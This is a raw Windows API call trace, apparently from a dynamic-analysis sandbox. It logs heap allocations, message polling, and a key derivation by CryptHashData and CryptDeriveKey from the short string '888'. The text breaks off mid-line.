[0250.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0250.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0250.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.555] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0250.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0250.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0250.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0250.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0250.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0250.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0250.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ef8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0250.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0250.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.558] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0250.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51820, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0250.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.558] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0250.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0250.559] CryptHashData (hHash=0xa87390, pbData=0x2e54f08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0250.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0250.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0250.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0250.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0250.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0250.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0250.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0250.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.562] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0250.562] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0250.562] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0250.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0250.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ac0 [0250.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ac0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0250.563] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87390, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa876d0) returned 1 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0250.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0250.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0250.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0250.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0250.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: 